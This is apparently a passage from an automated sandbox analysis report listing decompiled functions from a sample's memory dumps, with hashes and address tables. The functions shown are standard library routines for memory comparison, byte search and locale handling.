                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                            • Instruction ID: 5fe02c074a3402c61fbfaa3bfa09d4a00f6de270df62b9b646c231e59f82feb3
                                            • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                            • Instruction Fuzzy Hash: E5C182322051930ADF2F4A39C4344BFBAA15AAA7B171B176DE4B3CB5C4EF20C6B5D610
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00312B17, Relevance: .3, Instructions: 323COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00312B17(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































                                            0x00312b17
                                            0x00312b17
                                            0x00312b17
                                            0x00312b1d
                                            0x00312ba4
                                            0x00312ba6
                                            0x00312ba8
                                            0x00312f27
                                            0x00312f27
                                            0x00313d18
                                            0x00313d18
                                            0x00312bae
                                            0x00312bb4
                                            0x00312c3b
                                            0x00312c3d
                                            0x00312c3f
                                            0x00000000
                                            0x00000000
                                            0x00312c45
                                            0x00312c4b
                                            0x00312cd2
                                            0x00312cd4
                                            0x00312cd6
                                            0x00000000
                                            0x00000000
                                            0x00312cdc
                                            0x00312ce2
                                            0x00312d69
                                            0x00312d6b
                                            0x00312d6d
                                            0x00000000
                                            0x00000000
                                            0x00312d79
                                            0x00312e01
                                            0x00312e03
                                            0x00312e05
                                            0x00000000
                                            0x00000000
                                            0x00312e0b
                                            0x00312e11
                                            0x00312e98
                                            0x00312e9a
                                            0x00312e9c
                                            0x00000000
                                            0x00000000
                                            0x00312ea2
                                            0x00312ea8
                                            0x00312f1f
                                            0x00312f21
                                            0x00312f23
                                            0x00312f25
                                            0x00312f25
                                            0x00000000
                                            0x00312f23
                                            0x00312eb1
                                            0x00312eb3
                                            0x00312ec7
                                            0x00312ecf
                                            0x00312ed1
                                            0x00312ee5
                                            0x00312eed
                                            0x00312eef
                                            0x00312f03
                                            0x00312f0b
                                            0x00312f0d
                                            0x00312f16
                                            0x00312f16
                                            0x00000000
                                            0x00312f0d
                                            0x00312ef8
                                            0x00312f01
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312f01
                                            0x00312eda
                                            0x00312ee3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312ee3
                                            0x00312ebc
                                            0x00312ec5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312ec5
                                            0x00312e1e
                                            0x00312e20
                                            0x00312e38
                                            0x00312e40
                                            0x00312e42
                                            0x00312e5a
                                            0x00312e62
                                            0x00312e64
                                            0x00312e7c
                                            0x00312e84
                                            0x00312e86
                                            0x00312e8f
                                            0x00312e8f
                                            0x00000000
                                            0x00312e86
                                            0x00312e6d
                                            0x00312e76
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312e76
                                            0x00312e4b
                                            0x00312e54
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312e54
                                            0x00312e29
                                            0x00312e32
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312e32
                                            0x00312d87
                                            0x00312d89
                                            0x00312da1
                                            0x00312da9
                                            0x00312dab
                                            0x00312dc3
                                            0x00312dcb
                                            0x00312dcd
                                            0x00312de5
                                            0x00312ded
                                            0x00312def
                                            0x00312df8
                                            0x00312df8
                                            0x00000000
                                            0x00312def
                                            0x00312dd6
                                            0x00312ddf
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312ddf
                                            0x00312db4
                                            0x00312dbd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312dbd
                                            0x00312d92
                                            0x00312d9b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312d9b
                                            0x00312cef
                                            0x00312cf1
                                            0x00312d09
                                            0x00312d11
                                            0x00312d13
                                            0x00312d2b
                                            0x00312d33
                                            0x00312d35
                                            0x00312d4d
                                            0x00312d55
                                            0x00312d57
                                            0x00312d60
                                            0x00312d60
                                            0x00000000
                                            0x00312d57
                                            0x00312d3e
                                            0x00312d47
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312d47
                                            0x00312d1c
                                            0x00312d25
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312d25
                                            0x00312cfa
                                            0x00312d03
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312d03
                                            0x00312c58
                                            0x00312c5a
                                            0x00312c72
                                            0x00312c7a
                                            0x00312c7c
                                            0x00312c94
                                            0x00312c9c
                                            0x00312c9e
                                            0x00312cb6
                                            0x00312cbe
                                            0x00312cc0
                                            0x00312cc9
                                            0x00312cc9
                                            0x00000000
                                            0x00312cc0
                                            0x00312ca7
                                            0x00312cb0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312cb0
                                            0x00312c85
                                            0x00312c8e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312c8e
                                            0x00312c63
                                            0x00312c6c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312c6c
                                            0x00312bc1
                                            0x00312bc3
                                            0x00312bdb
                                            0x00312be3
                                            0x00312be5
                                            0x00312bfd
                                            0x00312c05
                                            0x00312c07
                                            0x00312c1f
                                            0x00312c27
                                            0x00312c29
                                            0x00312c32
                                            0x00312c32
                                            0x00000000
                                            0x00312c29
                                            0x00312c10
                                            0x00312c19
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312c19
                                            0x00312bee
                                            0x00312bf7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312bf7
                                            0x00312bcc
                                            0x00312bd5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312bd5
                                            0x00312b2a
                                            0x00312b2c
                                            0x00312b44
                                            0x00312b4c
                                            0x00312b4e
                                            0x00312b66
                                            0x00312b6e
                                            0x00312b70
                                            0x00312b88
                                            0x00312b90
                                            0x00312b92
                                            0x00312b9b
                                            0x00312b9b
                                            0x00000000
                                            0x00312b92
                                            0x00312b79
                                            0x00312b82
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312b82
                                            0x00312b57
                                            0x00312b60
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00312b60
                                            0x00312b35
                                            0x00312b3e
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction ID: 934cac790b2991d5d3ea2440de3ec314370e07fcc4fff4d714d0f8ad76755b07
                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction Fuzzy Hash: 00C1823220919309DF2F4A3AD4744BFBBA15AAA7B131B175DE4B2CB5C4EF20C5B5D620
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00311F20, Relevance: .1, Instructions: 76COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00311F20(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										return _t39 - 4;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											return _t39 - 3;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												return _t39 - 2;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						return _t39 - 1;
					}
				}
				L24:
			}













                                            0x00311f20
                                            0x00311f27
                                            0x00311f7c
                                            0x00311f7c
                                            0x00311f29
                                            0x00311f29
                                            0x00311f2f
                                            0x00311f39
                                            0x00311f51
                                            0x00311f51
                                            0x00311f54
                                            0x00311f68
                                            0x00311f68
                                            0x00311f6b
                                            0x00000000
                                            0x00311f6d
                                            0x00311f6d
                                            0x00311f6d
                                            0x00311f6f
                                            0x00311f74
                                            0x00000000
                                            0x00000000
                                            0x00311f76
                                            0x00311f79
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00311f79
                                            0x00000000
                                            0x00311f6d
                                            0x00311f56
                                            0x00311f63
                                            0x00311f82
                                            0x00311f84
                                            0x00311f92
                                            0x00311f9b
                                            0x00000000
                                            0x00311f9d
                                            0x00311fa0
                                            0x00311fa2
                                            0x00311fcc
                                            0x00311fa4
                                            0x00311fa4
                                            0x00311fa6
                                            0x00311fc6
                                            0x00311fa8
                                            0x00311fab
                                            0x00311fad
                                            0x00311fc0
                                            0x00311faf
                                            0x00311fb1
                                            0x00000000
                                            0x00311fb3
                                            0x00000000
                                            0x00311fb3
                                            0x00311fb1
                                            0x00311fad
                                            0x00311fa6
                                            0x00311fa2
                                            0x00000000
                                            0x00311f7d
                                            0x00311f7d
                                            0x00311f7d
                                            0x00000000
                                            0x00311f67
                                            0x00311f3b
                                            0x00311f3b
                                            0x00311f3b
                                            0x00311f3d
                                            0x00311f42
                                            0x00000000
                                            0x00000000
                                            0x00311f44
                                            0x00311f47
                                            0x00000000
                                            0x00311f49
                                            0x00311f4f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00311f4f
                                            0x00000000
                                            0x00311f47
                                            0x00311fb6
                                            0x00311fba
                                            0x00311fba
                                            0x00311f39
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: 0a9b926c8acd90712e8a0ffcfeb8c54c15616d867b964e0b66c83c73f1316225
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: 4A11C87720414143D61E862DD4B46FBE7A5EACE321B2E436AD3418B758D322A9D7E600
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 003311EC, Relevance: .0, Instructions: 26COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4055d925c376e0ed82dd58ad7afe26f3ff273b82d10e142d14ab059e1f986786
                                            • Instruction ID: 2c8a9a6a6aeb243f182fe5b2d0fcf7823aa4d9e9d273433090330c989b9bd9d6
                                            • Opcode Fuzzy Hash: 4055d925c376e0ed82dd58ad7afe26f3ff273b82d10e142d14ab059e1f986786
                                            • Instruction Fuzzy Hash: D7E01A366A4508AFCB85CBA8DC81D6AB3F8EB19320B154690F915C77A1D634EE00DA50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00331229, Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                            • Instruction ID: f3886ae7a701c71b84a63adc8df1c2dfc8b6abb397ae0d288d65fe729e160dff
                                            • Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                            • Instruction Fuzzy Hash: 8AE04F362105549BC7229A5AD880D97F7ECEF887B0B064826ED59D7A10C630FC10D790
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0033128C, Relevance: .0, Instructions: 7COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                            • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                            • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                            • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 003306F8, Relevance: .0, Instructions: 7COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                            • Instruction ID: 3677bb5e80ef881ef78b51b660802e1dde20cfa13a54c7594f24273deb6986df
                                            • Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                            • Instruction Fuzzy Hash: C8B09260A114C08AEB168324C969B4276E0A740B05FCA84E0E00582881C25CD984D500
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 003088A3, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E003088A3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t17;
				void* _t22;
				void* _t39;
				intOrPtr* _t41;
				void* _t44;

				_push(0x14);
				E0030F580(E00324705, __ebx, __edi, __esi);
				E003099F7(_t44 - 0x14, 0);
				_t41 =  *0x331a18; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t41;
				_t17 = E00301430( *((intOrPtr*)(_t44 + 8)), E00301380(0x331a10));
				_t43 = _t17;
				if(_t17 == 0) {
					if(_t41 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t22 = E00308C5A(__ebx, _t39, _t41, _t43, __eflags);
						__eflags = _t22 - 0xffffffff;
						if(_t22 == 0xffffffff) {
							E0030D31B(_t44 - 0x20, "bad cast");
							E0030F4FA(_t44 - 0x20, 0x32d290);
						}
						_t43 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x331a18 = _t43;
						 *((intOrPtr*)( *_t43 + 4))();
						E00308645(_t43);
					} else {
						_t43 = _t41;
					}
				}
				E00309A52(_t44 - 0x14);
				return E0030F55D(_t43);
			}








                                            0x003088a3
                                            0x003088aa
                                            0x003088b4
                                            0x003088b9
                                            0x003088c4
                                            0x003088c8
                                            0x003088d4
                                            0x003088d9
                                            0x003088dd
                                            0x003088e1
                                            0x003088e7
                                            0x003088ed
                                            0x003088ee
                                            0x003088f5
                                            0x003088f8
                                            0x00308902
                                            0x00308910
                                            0x00308910
                                            0x00308915
                                            0x0030891a
                                            0x00308922
                                            0x00308926
                                            0x003088e3
                                            0x003088e3
                                            0x003088e3
                                            0x003088e1
                                            0x0030892f
                                            0x0030893b

                                            APIs
                                            • __EH_prolog3.LIBCMT ref: 003088AA
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003088B4
                                              • Part of subcall function 003099F7: __lock.LIBCMT ref: 00309A08
                                            • int.LIBCPMT ref: 003088CB
